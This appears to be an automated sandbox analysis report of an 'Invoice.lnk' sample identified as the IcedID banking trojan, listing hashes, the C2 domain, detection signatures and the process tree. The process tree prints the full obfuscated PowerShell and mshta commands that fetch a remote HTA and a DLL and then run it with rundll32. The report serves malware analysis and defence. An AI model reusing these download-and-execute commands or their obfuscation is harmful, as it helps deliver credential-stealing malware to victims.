Analysis

  • max time kernel
    35s
  • max time network
    38s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    06-07-2022 20:36

General

  • Target

    Invoice.lnk

  • Size

    178KB

  • MD5

    c29d6fc092698aafe01ece64da57254f

  • SHA1

    523e8303f8d6853ef499b742ef5e9d7485803a88

  • SHA256

    d94a96230551df45ea50a618f4ef47ab5f2cceaa612da2acdbd05a34b3e32cae

  • SHA512

    fa37a95c3eb1256bea25cc19f84de5de77f24a38938e062a08fab2073a8cc9ca480fa58fc90103f0e298958605866b1ec192971099dcaca4966bd134ac243e50

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://comradespoon.com/5h.hta

Extracted

Family

icedid

Campaign

1487191074

C2

vneastruzz.com

Signatures

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • suricata: ET MALWARE Win32/IcedID Request Cookie

    suricata: ET MALWARE Win32/IcedID Request Cookie

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Invoice.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:240
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $OIdEhQrv = [convert]::FromBase64String('PjIv');$FByAlEjZ = [convert]::FromBase64String('GgQfAxZXHwMDB01YWBQYGgUWExIEBxgYGVkUGBpYQh9ZHwMW');$yZlUjspn = -join($OIdEhQrv | % {[char] ($_ -bxor 0x77)});$lMhAVEem = -join ($FByAlEjZ | % { [char] ($_ -bxor 0x77)});sal UFRBSlOH $yZlUjspn;UFRBSlOH $lMhAVEem
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:268
      • C:\Windows\system32\mshta.exe
        "C:\Windows\system32\mshta.exe" http://comradespoon.com/5h.hta
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1000
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function lpasD($HADYWKdP, $JQNbwy){[IO.File]::WriteAllBytes($HADYWKdP, $JQNbwy)};function UrOfCPrL($HADYWKdP){if($HADYWKdP.EndsWith((qQtFjAStmmZUquwlKa @(65433,65487,65495,65495))) -eq $True){Start-Process (qQtFjAStmmZUquwlKa @(rundll32.exe $HADYWKdP ,PluginInit ))}elseif($HADYWKdP.EndsWith((qQtFjAStmmZUquwlKa @(65433,65499,65502,65436))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $HADYWKdP}else{Start-Process $HADYWKdP}};function iaeLEXNRYglRNM($lpasD){$ssPVUzIfuhNMPpFbC=(qQtFjAStmmZUquwlKa @(65459,65492,65487,65487,65488,65497));$uAbUQLrXxwt=(Get-ChildItem $lpasD -Force);$uAbUQLrXxwt.Attributes=$uAbUQLrXxwt.Attributes -bor ([IO.FileAttributes]$ssPVUzIfuhNMPpFbC).value__};function BRrXupXAZjXJXcLwJn($fRadwPdaCcH){$ZudUcOaTTWDij = New-Object (qQtFjAStmmZUquwlKa @(65465,65488,65503,65433,65474,65488,65485,65454,65495,65492,65488,65497,65503));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$JQNbwy = $ZudUcOaTTWDij.DownloadData($fRadwPdaCcH);return $JQNbwy};function qQtFjAStmmZUquwlKa($aiWdOwItl){$JGtzYUbtTnusApt=65387;$ouOlcqQbirCOt=$Null;foreach($ALFUNolW in $aiWdOwItl){$ouOlcqQbirCOt+=[char]($ALFUNolW-$JGtzYUbtTnusApt)};return $ouOlcqQbirCOt};function bdpFrZCPoqatcoUiW(){$QuseLIVGitH = $env:ProgramData + '\';$LbGea = $QuseLIVGitH + '1.dll'; if (Test-Path -Path $LbGea){UrOfCPrL $LbGea;}Else{ $oGMWxNZW = BRrXupXAZjXJXcLwJn (qQtFjAStmmZUquwlKa @(65491,65503,65503,65499,65445,65434,65434,65486,65498,65496,65501,65484,65487,65488,65502,65499,65498,65498,65497,65433,65486,65498,65496,65434,65436,65433,65487,65495,65495));lpasD $LbGea $oGMWxNZW;UrOfCPrL $LbGea;};iaeLEXNRYglRNM $LbGea;;;;;}bdpFrZCPoqatcoUiW;
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1932
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\ProgramData\1.dll PluginInit
            5⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            PID:1848

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\1.dll

    Filesize

    813KB

    MD5

    35999cd6417ae33f264178adb800d560

    SHA1

    74276d57902e683fbcddb313cb34b0f92bcb52df

    SHA256

    1431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710

    SHA512

    78ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d

  • \ProgramData\1.dll

    Filesize

    813KB

    MD5

    35999cd6417ae33f264178adb800d560

    SHA1

    74276d57902e683fbcddb313cb34b0f92bcb52df

    SHA256

    1431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710

    SHA512

    78ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d

  • \ProgramData\1.dll

    Filesize

    813KB

    MD5

    35999cd6417ae33f264178adb800d560

    SHA1

    74276d57902e683fbcddb313cb34b0f92bcb52df

    SHA256

    1431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710

    SHA512

    78ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d

  • \ProgramData\1.dll

    Filesize

    813KB

    MD5

    35999cd6417ae33f264178adb800d560

    SHA1

    74276d57902e683fbcddb313cb34b0f92bcb52df

    SHA256

    1431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710

    SHA512

    78ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d

  • \ProgramData\1.dll

    Filesize

    813KB

    MD5

    35999cd6417ae33f264178adb800d560

    SHA1

    74276d57902e683fbcddb313cb34b0f92bcb52df

    SHA256

    1431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710

    SHA512

    78ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d

  • memory/240-54-0x000007FEFBFB1000-0x000007FEFBFB3000-memory.dmp

    Filesize

    8KB

  • memory/268-96-0x000000001B730000-0x000000001BA2F000-memory.dmp

    Filesize

    3.0MB

  • memory/268-88-0x0000000000000000-mapping.dmp

  • memory/268-99-0x00000000026F4000-0x00000000026F7000-memory.dmp

    Filesize

    12KB

  • memory/268-100-0x00000000026FB000-0x000000000271A000-memory.dmp

    Filesize

    124KB

  • memory/268-93-0x000007FEF4640000-0x000007FEF5063000-memory.dmp

    Filesize

    10.1MB

  • memory/268-94-0x00000000026F4000-0x00000000026F7000-memory.dmp

    Filesize

    12KB

  • memory/268-95-0x000007FEF3AE0000-0x000007FEF463D000-memory.dmp

    Filesize

    11.4MB

  • memory/268-97-0x00000000026FB000-0x000000000271A000-memory.dmp

    Filesize

    124KB

  • memory/1000-98-0x0000000000000000-mapping.dmp

  • memory/1848-108-0x0000000000000000-mapping.dmp

  • memory/1848-116-0x0000000180000000-0x0000000180009000-memory.dmp

    Filesize

    36KB

  • memory/1932-107-0x000000000260B000-0x000000000262A000-memory.dmp

    Filesize

    124KB

  • memory/1932-106-0x0000000002604000-0x0000000002607000-memory.dmp

    Filesize

    12KB

  • memory/1932-105-0x000007FEF3B70000-0x000007FEF46CD000-memory.dmp

    Filesize

    11.4MB

  • memory/1932-102-0x0000000000000000-mapping.dmp

  • memory/1932-114-0x0000000002604000-0x0000000002607000-memory.dmp

    Filesize

    12KB

  • memory/1932-115-0x000000000260B000-0x000000000262A000-memory.dmp

    Filesize

    124KB